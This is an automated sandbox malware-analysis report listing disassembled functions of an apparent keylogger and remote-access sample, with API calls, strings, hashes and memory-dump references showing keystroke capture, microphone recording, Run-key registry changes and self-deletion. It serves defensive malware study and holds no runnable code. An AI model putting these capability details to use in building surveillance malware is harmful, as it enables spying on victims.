                              • Opcode Fuzzy Hash: 3b78be7274fe7523ce167e025b78789c7b39fba0dda90363f1a256c0226bf42c
                              • Instruction Fuzzy Hash: BC01A7B6A00108BFDB049B95DD46EFF7ABDDF44240F10007AF901E2251E6749F009664
                              Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                              • CloseHandle.KERNEL32(?), ref: 0040A7CA
                              • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                              • String ID: Online Keylogger Stopped
                              • API String ID: 1623830855-1496645233
                              • Opcode ID: 39cace8de3b71b1ab7e2389c94fa8a099f32ea781476cbb4ed9a2e65fdbab590
                              • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                              • Opcode Fuzzy Hash: 39cace8de3b71b1ab7e2389c94fa8a099f32ea781476cbb4ed9a2e65fdbab590
                              • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                              Function 004016E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                              Download Yara Rule
                              APIs
                              • waveInPrepareHeader.WINMM(005DDDE8,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                              • waveInAddBuffer.WINMM(005DDDE8,00000020,?,00000000,00401913), ref: 0040175D
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: wave$BufferHeaderPrepare
                              • String ID: Ho]
                              • API String ID: 2315374483-1987534667
                              • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                              • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                              • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                              • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                              Function 00447790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: LocaleValid
                              • String ID: IsValidLocaleName$j=D
                              • API String ID: 1901932003-3128777819
                              • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                              • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                              • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                              • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                              Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                              Download Yara Rule
                              APIs
                              • GetKeyState.USER32(00000011), ref: 0040AD5B
                                • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                              • String ID: [AltL]$[AltR]
                              • API String ID: 2738857842-2658077756
                              • Opcode ID: c0c7afa873da1f73a1fe5c81c8cf2f93ed3ee5fe4ba19fbc98e8737b6bcc32b1
                              • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                              • Opcode Fuzzy Hash: c0c7afa873da1f73a1fe5c81c8cf2f93ed3ee5fe4ba19fbc98e8737b6bcc32b1
                              • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                              Function 00448803 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                              Download Yara Rule
                              APIs
                              • _free.LIBCMT ref: 00448825
                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorFreeHeapLast_free
                              • String ID: `@$`@
                              • API String ID: 1353095263-20545824
                              • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                              • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                              • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                              • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                              Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                              Download Yara Rule
                              APIs
                              • GetKeyState.USER32(00000012), ref: 0040ADB5
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: State
                              • String ID: [CtrlL]$[CtrlR]
                              • API String ID: 1649606143-2446555240
                              • Opcode ID: 017dd08ea117ef9949e136069607eb1ceb0e9bbc0bd8767c02a12888e350b825
                              • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                              • Opcode Fuzzy Hash: 017dd08ea117ef9949e136069607eb1ceb0e9bbc0bd8767c02a12888e350b825
                              • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                              Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                              • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                              Strings
                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: DeleteOpenValue
                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                              • API String ID: 2654517830-1051519024
                              • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                              • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                              • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                              • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                              Function 0040AF77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                              Download Yara Rule
                              APIs
                              • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                              • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: DeleteDirectoryFileRemove
                              • String ID: pth_unenc
                              • API String ID: 3325800564-4028850238
                              • Opcode ID: 4546e6e0ba58337ae7336522498a141f2916029a30d3b6ad4aab1b42fa748339
                              • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                              • Opcode Fuzzy Hash: 4546e6e0ba58337ae7336522498a141f2916029a30d3b6ad4aab1b42fa748339
                              • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                              Function 00411699 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                              • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ObjectProcessSingleTerminateWait
                              • String ID: pth_unenc
                              • API String ID: 1872346434-4028850238
                              • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                              • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                              • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                              • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                              Function 0044E0EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CommandLine
                              • String ID: @)\
                              • API String ID: 3253501508-2839598822
                              • Opcode ID: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                              • Instruction ID: 13d69598d350970c9b91df73096b24a53109b9b907d0ea4b726438dfa3130670
                              • Opcode Fuzzy Hash: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                              • Instruction Fuzzy Hash: 09B0027D8157009FC7419F79BD5D1443BA0B75861339094B5DC19C7B35DA358085EF18
                              Function 0043FA5E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                              • GetLastError.KERNEL32 ref: 0043FB02
                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide$ErrorLast
                              • String ID:
                              • API String ID: 1717984340-0
                              • Opcode ID: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
                              • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                              • Opcode Fuzzy Hash: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
                              • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759